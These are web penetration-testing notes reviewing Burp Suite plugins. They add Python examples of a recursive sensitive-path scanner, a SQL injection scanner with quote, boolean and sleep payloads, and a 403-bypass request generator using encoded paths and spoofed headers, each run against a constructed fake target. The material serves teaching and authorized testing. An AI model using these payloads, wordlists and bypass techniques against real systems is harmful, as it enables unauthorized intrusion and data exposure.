Burp plugins
Directory scanning
APIKit
Finds API endpoints such as Swagger/OpenAPI documentation.
onescan
Recursive directory brute-forcing. https://github.com/vaycore/OneScan
When the target site is browsed at http://www.xxxxxx.com/a/b/c/xxx.min.js, the plugin automatically scans the wordlist against every parent directory of that path, e.g.:
http://www.xxxxxx.com/api-docs
http://www.xxxxxx.com/xxxxxx.zip
http://www.xxxxxx.com/a/api-docs
http://www.xxxxxx.com/a/xxxxxx.zip
http://www.xxxxxx.com/a/b/api-docs
http://www.xxxxxx.com/a/b/xxxxxx.zip
http://www.xxxxxx.com/a/b/c/api-docs
http://www.xxxxxx.com/a/b/c/xxxxxx.zip
Entries in the scan wordlist (each is appended to every parent path; the {{...}} placeholders are filled in from the target host):
/v2/api-docs
/api/v1
/api/v2
/api/v1/
/api/v2/
/{{domain}}.zip
/{{domain.main}}.zip
/{{domain.name}}.zip
/env
/actuator
/jolokia/list
/swagger-resources
/v1/swagger.json
/v2/swagger.json
/druid/index.html
/druid/basic.json
/.git
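The recursive expansion above can be reproduced in a few lines. The following is an added example written for these notes, not code from OneScan: it takes a browsed URL and the wordlist, walks every parent directory, and substitutes the placeholders. The meaning of the three placeholders (whole host, registrable domain, domain label without TLD) is an assumption about OneScan's behaviour, not taken from its source, as is the naive dot-split that does not handle suffixes such as .com.cn.

```python
from urllib.parse import urlsplit

# Constructed wordlist mirroring the entries listed above.
WORDLIST = [
    "/v2/api-docs", "/api/v1", "/api/v2", "/api/v1/", "/api/v2/",
    "/{{domain}}.zip", "/{{domain.main}}.zip", "/{{domain.name}}.zip",
    "/env", "/actuator", "/jolokia/list", "/swagger-resources",
    "/v1/swagger.json", "/v2/swagger.json",
    "/druid/index.html", "/druid/basic.json", "/.git",
]


def domain_vars(host):
    """Derive placeholder values from a hostname (assumed semantics, see lead-in).
    www.xxxxxx.com -> domain=www.xxxxxx.com, domain.main=xxxxxx.com, domain.name=xxxxxx.
    Naive split on dots; multi-part public suffixes (.com.cn) are not handled."""
    labels = host.split(".")
    main = ".".join(labels[-2:]) if len(labels) >= 2 else host
    name = labels[-2] if len(labels) >= 2 else host
    return {"domain": host, "domain.main": main, "domain.name": name}


def parent_paths(path):
    """Every directory prefix of a request path, shallowest first.
    /a/b/c/xxx.min.js -> ['', '/a', '/a/b', '/a/b/c']; the file name is dropped."""
    segments = [s for s in path.split("/") if s]
    if not path.endswith("/") and segments:
        segments = segments[:-1]  # last segment is a file, not a directory
    return ["/".join([""] + segments[:i]) for i in range(len(segments) + 1)]


def expand(word, vars_):
    """Replace {{key}} placeholders in one wordlist entry."""
    for key, value in vars_.items():
        word = word.replace("{{" + key + "}}", value)
    return word


def generate_scan_urls(url, wordlist=WORDLIST):
    """All URLs a passive recursive scanner would request for one browsed URL."""
    parts = urlsplit(url)
    base = f"{parts.scheme}://{parts.netloc}"
    vars_ = domain_vars(parts.hostname or "")
    seen, out = set(), []
    for parent in parent_paths(parts.path):
        for word in wordlist:
            full = base + parent + expand(word, vars_)
            if full not in seen:  # dedupe across overlapping parents
                seen.add(full)
                out.append(full)
    return out


if __name__ == "__main__":
    for u in generate_scan_urls("http://www.xxxxxx.com/a/b/c/xxx.min.js"):
        print(u)
```

Note how quickly this multiplies: four parent directories times seventeen entries is 68 requests for a single browsed JavaScript file, which is why the plugin deduplicates across pages and why a noisy wordlist is easy to spot in WAF logs.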
Sensitive information
HaE
Highlights sensitive information in request and response messages.
Must-have.
Vulnerability scanning
xiaSQL
Simple SQL injection scanner. The principle is straightforward: append a single quote (and a couple of variants) to the request and compare how the response changes. Payloads, URL-encoded:
'%20or%201='1
'%20and%20sleep(5)#
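The "append a quote and watch the response" idea is easy to underestimate: a useful scanner has to inject one parameter at a time and compare several signals against a baseline (database error strings, status code, body length, and response time for the sleep payload). The block below is an added example written for these notes, not xiaSQL's own code. The error-message regex is a constructed subset, the thresholds are arbitrary, and fake_send is a constructed stand-in for a target whose id parameter is concatenated into SQL; the payloads are the decoded forms of the three listed above, since urlencode re-encodes them.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Decoded forms of the payloads in the notes; appended verbatim to one parameter value.
PAYLOADS = ["'", "' or 1='1", "' and sleep(5)#"]

# Constructed, non-exhaustive list of database error signatures.
SQL_ERRORS = re.compile(
    r"You have an error in your SQL syntax|mysql_fetch|ORA-\d{5}|"
    r"unterminated quoted string|PG::SyntaxError|SQLSTATE\[|"
    r"Unclosed quotation mark|Microsoft OLE DB Provider for SQL Server|"
    r"org\.hibernate\.|java\.sql\.SQLException",
    re.IGNORECASE,
)


def inject_each_param(url, payload):
    """Yield (param, mutated_url) with the payload appended to one parameter at a
    time, so that a hit can be attributed to a specific parameter."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, value) in enumerate(params):
        mutated = params[:i] + [(name, value + payload)] + params[i + 1:]
        yield name, urlunsplit(parts._replace(query=urlencode(mutated)))


def judge(baseline, probe, payload, delay=5, len_ratio=0.3):
    """Compare a probe response with the baseline. Responses are dicts with
    'status', 'body' and 'elapsed' (seconds). Returns the signals that fired."""
    reasons = []
    if SQL_ERRORS.search(probe["body"]) and not SQL_ERRORS.search(baseline["body"]):
        reasons.append("database error message in response")
    if probe["status"] != baseline["status"]:
        reasons.append(f"status changed {baseline['status']} -> {probe['status']}")
    b, p = len(baseline["body"]), len(probe["body"])
    if b and abs(p - b) / b > len_ratio:
        reasons.append(f"response length changed {b} -> {p}")
    # Time-based signal only makes sense for the sleep payload; allow some jitter.
    if "sleep(" in payload and probe["elapsed"] - baseline["elapsed"] >= delay * 0.8:
        reasons.append(f"response delayed by {probe['elapsed'] - baseline['elapsed']:.1f}s")
    return reasons


def scan(url, send):
    """send(url) -> response dict. Returns {param: {payload: [reasons]}}, hits only."""
    baseline = send(url)
    findings = {}
    for payload in PAYLOADS:
        for param, mutated in inject_each_param(url, payload):
            reasons = judge(baseline, send(mutated), payload)
            if reasons:
                findings.setdefault(param, {})[payload] = reasons
    return findings


def fake_send(url):
    """Constructed target: 'id' is concatenated into SQL, 'page' is ignored.
    An odd number of quotes breaks the string literal; sleep() stalls the query."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    id_ = params.get("id", "")
    if "sleep(" in id_:
        return {"status": 200, "body": "<html>item 1</html>", "elapsed": 5.1}
    if id_.count("'") % 2 == 1:
        return {"status": 500, "body": "You have an error in your SQL syntax near ''''",
                "elapsed": 0.1}
    return {"status": 200, "body": "<html>item 1</html>", "elapsed": 0.1}


if __name__ == "__main__":
    print(scan("http://www.xxxxxx.com/item?id=1&page=2", fake_send))
```

Against the constructed target the lone quote trips the error, status and length signals at once, the balanced ' or 1='1 payload produces no visible change (it is syntactically valid SQL, which is exactly why it is a poor detection payload on its own), and the sleep payload is caught only by timing. Length and status diffs are noisy on dynamic pages; a real scanner should request the baseline twice to measure normal variance before trusting them.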
BurpFastJsonScan
https://github.com/pmiaowu/BurpFastJsonScan
Detection: command echo or DNSLog callback; Burp's built-in Collaborator is enough for the out-of-band part.
SpringScan
- Spring Core RCE (CVE-2022-22965)
- Spring Cloud Function SpEL RCE (CVE-2022-22963)
- Spring Cloud GateWay SPEL RCE (CVE-2022-22947)
https://github.com/metaStor/SpringScan Requires DNSLog.
Optional; I feel it is of little use in practice, it rarely finds anything.
Log4j2Scan
https://github.com/whwlsfb/Log4j2Scan
Passively scans for Log4j vulnerabilities; requires DNSLog.
Optional; rarely finds anything in practice.
BurpShiroPassiveScan
Shiro scanner
https://github.com/pmiaowu/BurpShiroPassiveScan
Detects Shiro and brute-forces the key (no DNSLog or other out-of-band service needed).
Optional; rarely finds anything in practice, and OneScan already includes Shiro fingerprinting.
reflector
https://github.com/elkokc/reflector
Reflected XSS detection: flags request parameters that are reflected in the response.
xiayue
https://github.com/smxiazi/xia_Yue
Tests for authorization bypass (privilege escalation / IDOR). Same author as xiaSQL; this author is brilliant, simple and brute-force.
403bypasser
https://github.com/sting8k/BurpSuite_403Bypasser
Tries to bypass 403 responses in search of surprises. Requires Jython.
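What a 403 bypasser actually does is generate request variants that a front proxy's access rule may not match but the backend still routes to the protected resource: path mutations (encoded dots, doubled slashes, trailing junk, case changes), rewrite/IP headers, and alternative methods. The block below is an added example for these notes, not the plugin's code; the variant and header lists are a representative subset written from memory, and fake_send is a constructed target with two classic weaknesses (a prefix ACL on the raw path in front of a backend that normalizes the path, and a backend that trusts X-Original-URL).

```python
import posixpath
from urllib.parse import unquote

# Headers that some backends use to override the routed path or client IP (assumed subset).
REWRITE_HEADERS = ["X-Original-URL", "X-Rewrite-URL"]
IP_HEADERS = {
    "X-Forwarded-For": "127.0.0.1",
    "X-Custom-IP-Authorization": "127.0.0.1",
    "X-Originating-IP": "127.0.0.1",
    "X-Remote-Addr": "127.0.0.1",
}
METHODS = ["POST", "PUT", "PATCH", "TRACE", "OPTIONS"]


def path_variants(path):
    """Mutations of a forbidden path that a raw-string ACL may fail to match."""
    p = path.rstrip("/") or "/"
    parent, name = p.rsplit("/", 1)
    return [
        f"{parent}/%2e/{name}",   # encoded dot segment, normalized away by the backend
        f"{parent}/./{name}",     # literal dot segment
        f"{parent}//{name}//",    # doubled slashes
        f"{p}/.",
        f"{p}%20",                # trailing encoded space / tab
        f"{p}%09",
        f"{p}?",
        f"{p}#",
        f"{p}.json",
        f"{p}..;/",               # Tomcat-style path parameter tricks
        f"{p};/",
        f"{p}/*",
        p.upper(),                # case variation
    ]


def bypass_candidates(path):
    """Candidate requests as dicts with method, path, headers and a technique label."""
    cands = [{"method": "GET", "path": v, "headers": {}, "technique": f"path {v}"}
             for v in path_variants(path)]
    for h in REWRITE_HEADERS:   # request an allowed path, name the real target in a header
        cands.append({"method": "GET", "path": "/", "headers": {h: path},
                      "technique": f"header {h}"})
    for h, v in IP_HEADERS.items():
        cands.append({"method": "GET", "path": path, "headers": {h: v},
                      "technique": f"header {h}"})
    for m in METHODS:
        cands.append({"method": m, "path": path, "headers": {}, "technique": f"method {m}"})
    return cands


def find_bypasses(path, send):
    """send(method, path, headers) -> dict with 'status' and 'body'.
    Returns the techniques that turned a 403 baseline into a non-error status.
    A human still has to confirm the body is the protected resource, not a generic page."""
    baseline = send("GET", path, {})
    if baseline["status"] != 403:
        return []
    return [c["technique"] for c in bypass_candidates(path)
            if send(c["method"], c["path"], c["headers"])["status"] < 400]


def fake_send(method, path, headers):
    """Constructed target. Proxy ACL: deny if the raw path starts with /admin.
    Backend: route on X-Original-URL if present, else on the decoded, normalized path."""
    if path.startswith("/admin"):
        return {"status": 403, "body": "Forbidden"}
    routed = headers.get("X-Original-URL") or posixpath.normpath(unquote(path))
    if routed.rstrip("/") == "/admin":
        return {"status": 200, "body": "admin panel"}
    return {"status": 404, "body": "Not Found"}


if __name__ == "__main__":
    print(find_bypasses("/admin", fake_send))
```

Against the constructed target only the two dot-segment variants and the X-Original-URL header get through; //admin// fails because posixpath.normpath preserves a leading double slash, which is a reminder that each variant targets a specific normalization quirk and most will miss on any given stack. The fix on the defending side is the same in every case: enforce authorization in the application on the canonical path, never on a raw-string prefix match in front of it, and drop client-supplied rewrite headers at the edge.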